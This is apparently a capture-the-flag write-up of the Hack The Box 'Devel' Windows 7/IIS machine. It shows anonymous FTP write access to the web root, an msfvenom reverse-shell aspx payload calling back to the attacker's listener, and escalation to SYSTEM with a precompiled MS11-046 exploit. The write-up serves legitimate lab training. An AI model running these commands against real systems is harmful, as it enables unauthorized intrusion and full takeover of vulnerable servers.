Enumeration

nmap to start our enumeration as always:

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
| 08-18-24  10:04AM                    6 test.txt
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

We have FTP available on port 21. Anonymous access is available using the credentials, anonymous:anonymous. Looking at the results shows we are within an IIS installation and we have write access to this directory.

220 Microsoft FTP Service
Name (10.129.110.15:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||49157|)
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||49158|)
125 Data connection already open; Transfer starting.
100% |***************************************|     6      119.57 KiB/s    --:-- ETA
226 Transfer complete.
6 bytes sent in 00:00 (0.05 KiB/s)
ftp>

With an open port 80 showing a web server with the iisstart.htm file available, and write access to the area where the IIS application is being served from, we have a path forward for exploitation.

Initial Foothold

IIS is Microsoft’s default web server software. It typically serves asp and aspx files plus a handful of others. It can be extended to serve NodeJS and PHP although that’s not in use for this web server.

MSFvenom supports creating reverse shells in aspx format so we can try creating and uploading one to the server and see if we get a callback.

To create our reverse shell, we can run this command (changing HOST and PORT as necessary):

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<HOST> LPORT=<PORT> -f aspx > reverse.aspx

Then it can be uploaded to the FTP session using:

bin
put reverse.aspx

Note: It may require binary mode to ensure the payload is uploaded correctly

Browsing to /reverse.aspx will trigger the reverse shell which can be caught in msfconsole using the multi/handler configured with the correlated options for the payload.

[*] Started reverse TCP handler on 10.10.14.23:4444
[*] Sending stage (176198 bytes) to 10.129.110.15
[*] Meterpreter session 1 opened (10.10.14.23:4444 -> 10.129.110.15:49169) at 2024-08-18 17:17:31 +1000

meterpreter > getuid
Server username: IIS APPPOOL\Web
meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >

We land on the machine as the IIS APPPOOL user.

Escalation

The box is old and unpatched. This is revealed after running systeminfo from the granted shell. I used local_exploit_suggester from MetaSploit but none of the exploits it suggested will work so I’m not sure what checks they are doing to determine eligibility. Some of them aren’t even for this version of Windows. Might be a bug at the time of writing.

One of the exploits that works is MS11-046, which has a pre-compiled binary at https://github.com/abatchy17/WindowsExploits/tree/master/MS11-046.

Using the open meterpreter shell, I uploaded the exploit to a temp folder and executed it to get root:

meterpreter > upload ~/Downloads/MS11-046.exe
[*] Uploading  : /home/kali/Downloads/MS11-046.exe -> MS11-046.exe
[*] Uploaded 110.17 KiB of 110.17 KiB (100.0%): /home/kali/Downloads/MS11-046.exe -> MS11-046.exe
[*] Completed  : /home/kali/Downloads/MS11-046.exe -> MS11-046.exe
meterpreter > shell
Process 2332 created.
Channel 26 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\temp>.\MS11-046.exe
.\MS11-046.exe

c:\Windows\System32>whoami
whoami
nt authority\system

c:\Windows\System32>